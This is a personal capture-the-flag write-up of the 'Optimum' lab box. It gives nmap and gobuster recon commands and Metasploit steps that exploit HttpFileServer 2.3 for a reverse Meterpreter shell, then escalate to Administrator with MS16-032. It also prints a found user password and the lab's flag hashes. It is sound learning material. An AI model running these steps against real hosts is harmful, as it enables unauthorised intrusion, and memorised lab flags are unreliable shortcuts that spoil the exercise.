Optimum
TARGET IP: 10.10.10.8
HOST IP: 10.10.16.10
Recon
NMAP
nmap [Target IP]

nmap [Target IP] -A -p 80

HTTP

Nothing on page source that I could find.
It is using HttpFileServer 2.3
Their latest version is 2.3m

The login button opens up prompt for login.

Let's take a crack at logging in with the credentials admin:admin.

Discovered a new directory, /~login. Note the tilde in front of it.
Vulnerable Software
HFS 2.3 is old and filled with goodies.
Lots of vulnerabilities are mentioned on their own website:
Enumeration
Gobuster
gobuster dir -u http://[Target IP] -w /usr/share/dirb/wordlists/common.txt

Try putting a ~ at the end, since we saw that the /~login directory had it.
gobuster dir -u http://[Target IP]/~ -w /usr/share/dirb/wordlists/common.txt
WinPEASx64
Credentials for kostas: kdeEjDowkS*
I need to be better at looking through these to see if I could've found more information.
Browsing
Run the typical commands from the hacktricks checklist to see some information on the system.
sysinfo
This will tell us the system is Windows Server 2012 R2, a 64-bit system.
Exploit
Metasploit
Let's check out Metasploit
msfconsole
search hfs
use 1
show options
set rhosts [Target IP]
set lhost [Host IP]
check
exploit
Now we have a Meterpreter session.
shell
whoami
type C:\Users\kostas\Desktop\user.txt
User Flag
b9058357319a5b76f10e01253a382c67
Next step is to use Metasploit to gain root privileges. I tried browsing the system for a while but didn't find anything useful. The tool I need is a kernel exploit.
When we ran the sysinfo command we found the system is a Windows Server 2012 R2 box, which is a 64-bit architecture. The reverse_tcp_shell that we are using as our payload is a 32-bit process. We should migrate to a different process that is 64-bit. In the Meterpreter shell, run the following.
ps
We see that the explorer.exe process is running as PID 660. Let's migrate over to this process.
migrate [PID for explorer.exe]
Next, let's background the current Meterpreter session we have on the system.
bg
We can confirm this has been backgrounded:
sessions
Since we now have access to the Windows system, let's see if we can find another Metasploit local exploit to gain root privileges.
search exploit/windows/local
I had to get a hint here and use a Microsoft vulnerability in the system, MS16-032.
use 33
I'm not sure if winPEASx64 showed this somewhere, but I could have also used a tool called windows-exploit-suggester. Here is a write-up on how to use it. It's a bit complicated, as you run it on your host system by exporting the target system info.
After selecting our exploit in Metasploit we will then set it up and run it.
show options
set session 1
set lhost [Host IP]
exploit
We now have a shell on the system as Administrator.
shell
type C:\Users\Administrator\Desktop\root.txt
64869e78042316656ffc989ba52d5d2b
Conclusion
I knew going into this lab that I could use Metasploit. I didn't know when I would get to use it, but I knew it was an option. I wanted to try to get access to the system without Metasploit, but I don't think my level of skill is high enough to do it, let alone understand it.
I need to work on my enumeration skills with Windows systems. I have a far better understanding of Linux and could probably spend some more time with Windows.
It was a good lab, but I'd really like to finish one of these without help one day.